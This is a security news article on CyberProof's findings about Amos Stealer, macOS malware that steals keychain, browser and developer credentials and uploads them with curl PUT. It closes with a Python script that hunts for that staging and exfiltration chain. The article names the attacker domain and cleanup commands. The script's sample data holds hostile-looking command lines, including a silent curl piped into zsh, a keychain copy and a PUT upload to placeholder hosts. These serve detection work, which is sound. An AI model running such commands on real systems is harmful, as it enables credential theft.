Amos Stealer, an information-stealing malware, is targeting Apple Mac computers to steal private data, according to new details from cybersecurity research firm CyberProof. Threat actors are reportedly using this malware family to run financially motivated campaigns by compromising macOS environments.
Although Amos Stealer is not new, in the latest campaign the threat actors are distributing the infostealer through deceptive software downloads, fake websites, and social engineering lures.
Once inside a Mac, it searches for valuable files across system directories. It then collects saved passwords, session cookies, and autofill form data from the Google Chrome and Microsoft Edge browsers.
Silent Download Methods
Researchers noted that the malware operators use the built-in macOS utility curl to download the malicious files silently. During a recent incident investigation, a threat hunting query flagged an unusual curl command.
That command identified the specific server address the cybercriminals were using to fetch the malicious script as:
Further probing showed that the attackers ran curl with the flags -fsSL, which make the download effectively invisible to the user: -f makes curl fail silently on HTTP errors instead of writing the server's error page to its output, -s suppresses the progress meter, -S still reports a failure on stderr, and -L follows redirects. The same combination is common in legitimate one-line installers, so the suspicious part is not the flags alone but a silent fetch whose output is piped straight into a shell. Once the script is downloaded, it automatically launches an AppleScript command through the zsh shell to begin collecting data.
“Amos Stealer remains a prominent and highly active malware family specifically engineered to target macOS users and extract sensitive information from compromised systems,” researchers explained in the blog post shared with Hackread.com.
Data Stealing and Cleanup
Investigation also revealed that the info-stealer copies the macOS Keychain database file, login.keychain-db, to access saved corporate login details. It also searches the user's home directory for confidential developer configuration files and keys, including .kube, .ssh, .zshrc, and .gitconfig.
To prepare the data for the attackers, the malware uses the native macOS tool ditto to compress the stolen files into a single archive named osalogging.zip inside the /tmp folder. The script splits this file into 10 MB chunks, and a unique session ID is generated for the upload by combining the current timestamp with a random hexadecimal string from OpenSSL.
Amos Stealer then sends the data to the attacker-controlled server (bestbuydomain.com) using HTTP PUT requests via curl. A notable aspect is that the script retries failed uploads up to eight times. After a successful upload, Amos Stealer runs cleanup commands (rm -f /tmp/osalogging.zip and rm -rf /tmp/sync) to erase its traces.
This silent type of attack lets threat actors easily steal saved credentials, which can leave compromised corporate networks exposed to data breaches and financial theft. CyberProof recommends that companies enforce strict Gatekeeper policies and monitor endpoints for unusual curl commands to block these threat actors; given the chain described above, copies of login.keychain-db and ditto or split activity under /tmp are worth watching for as well.
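As an added illustration (not code from CyberProof's report, from Hackread, or from the malware itself), the following Python script runs the two hunts that the staging and exfiltration behaviour described above suggests over a handful of constructed macOS process-execution records. It flags a silent curl fetch whose output is piped into a shell (the installer pattern), and it correlates, per host, the keychain copy, ditto archive, split into 10 MB chunks, curl PUT upload and rm cleanup into one chain rather than alerting on any single command. The host names, timestamps, domains under example.invalid and file paths in the sample records are constructed for the example; only the osalogging.zip and /tmp/sync names, the login.keychain-db file, the PUT upload and the 10 MB chunk size come from the report.

```python
"""Hunt for Amos-style staging and exfiltration in process telemetry (added example)."""
import os
import re
import shlex
from collections import defaultdict

# Constructed sample telemetry: (host, ISO timestamp, command line). Not real IOCs.
SAMPLE_EVENTS = [
    ("mac-01", "2025-06-01T09:00:01Z",
     "curl -fsSL https://update.example.invalid/setup.sh | zsh"),
    ("mac-01", "2025-06-01T09:00:03Z",
     "cp /Users/alice/Library/Keychains/login.keychain-db /tmp/sync/login.keychain-db"),
    ("mac-01", "2025-06-01T09:00:04Z",
     "ditto -c -k /tmp/sync /tmp/osalogging.zip"),
    ("mac-01", "2025-06-01T09:00:05Z",
     "split -b 10m /tmp/osalogging.zip /tmp/sync/part_"),
    ("mac-01", "2025-06-01T09:00:06Z",
     "curl -s -X PUT -T /tmp/sync/part_aa https://upload.example.invalid/u/1717232406-9f3a2c"),
    ("mac-01", "2025-06-01T09:00:09Z", "rm -f /tmp/osalogging.zip"),
    # Benign look-alikes on another host: a fetch saved to disk, and a user zipping a folder.
    ("mac-02", "2025-06-01T10:15:00Z",
     "curl -fsSL -o /tmp/brew.sh https://example.invalid/install.sh"),
    ("mac-02", "2025-06-01T10:16:00Z",
     "ditto -c -k /Users/bob/Documents/report /tmp/report.zip"),
]

SHELLS = {"sh", "bash", "zsh", "osascript"}
SUBST = re.compile(r"\$\(\s*curl\b([^)]*)\)")  # zsh -c "$(curl ...)" form


def curl_short_flags(tokens):
    """Collect letters of single-dash options, so -fsSL yields {'f','s','S','L'}."""
    letters = set()
    for tok in tokens:
        if tok.startswith("-") and not tok.startswith("--") and len(tok) > 1:
            letters.update(tok[1:])
    return letters


def silent_curl_to_shell(cmdline):
    """True when a silent curl fetch feeds a shell, as `curl -fsSL URL | zsh`
    or `zsh -c "$(curl -fsSL URL)"`. The -fsSL flags alone are not the signal;
    the pipe into an interpreter is. Drop the silent check to widen the net."""
    try:
        head, sep, tail = cmdline.partition("|")
        if sep:
            ptoks, ctoks = shlex.split(head), shlex.split(tail)
            if (ptoks and os.path.basename(ptoks[0]) == "curl"
                    and ctoks and os.path.basename(ctoks[0]) in SHELLS):
                return "s" in curl_short_flags(ptoks) or "--silent" in ptoks
            return False
        m = SUBST.search(cmdline)
        if m:
            outer = shlex.split(cmdline)
            inner = shlex.split(m.group(1))
            return (bool(outer) and os.path.basename(outer[0]) in SHELLS
                    and ("s" in curl_short_flags(inner) or "--silent" in inner))
    except ValueError:  # unbalanced quotes in the record
        return False
    return False


# Stages of the exfiltration chain, in the order the report describes them.
EXFIL_STAGES = [
    ("keychain_copy", re.compile(r"login\.keychain-db")),
    ("ditto_archive", re.compile(r"^ditto\b.*\.zip\b")),
    ("split_chunks", re.compile(r"^split\b.*-b\s*10m\b")),
    ("curl_put", re.compile(r"^curl\b.*(?:-X\s*PUT|-T\s)")),
    ("cleanup", re.compile(r"^rm\b.*\s/tmp/")),
]


def match_stage(cmdline):
    """Return the first chain stage a command line matches, or None."""
    for name, pattern in EXFIL_STAGES:
        if pattern.search(cmdline):
            return name
    return None


def correlate_exfil_chain(events, min_stages=3):
    """Per host, list the distinct stages seen in time order; report hosts that
    reach min_stages. A lone ditto or rm is noise; the sequence is the finding."""
    seen = defaultdict(list)
    for host, _ts, cmd in sorted(events, key=lambda e: (e[0], e[1])):
        stage = match_stage(cmd)
        if stage and stage not in seen[host]:
            seen[host].append(stage)
    return {h: s for h, s in seen.items() if len(s) >= min_stages}


def hunt(events):
    """Run both detectors and return the findings."""
    return {
        "silent_curl_to_shell": [e for e in events if silent_curl_to_shell(e[2])],
        "exfil_chains": correlate_exfil_chain(events),
    }


if __name__ == "__main__":
    for kind, found in hunt(SAMPLE_EVENTS).items():
        print(kind, found)
```

Feed it your own process-execution records (EDR command-line telemetry or unified-log exec events) in the same (host, timestamp, command line) shape. The chain detector deliberately keys on the generic shape of the procedure (keychain file, ditto to a zip, 10 MB split, PUT upload, rm under /tmp) rather than on the osalogging.zip name alone, since the file name is the easiest thing for the operators to change.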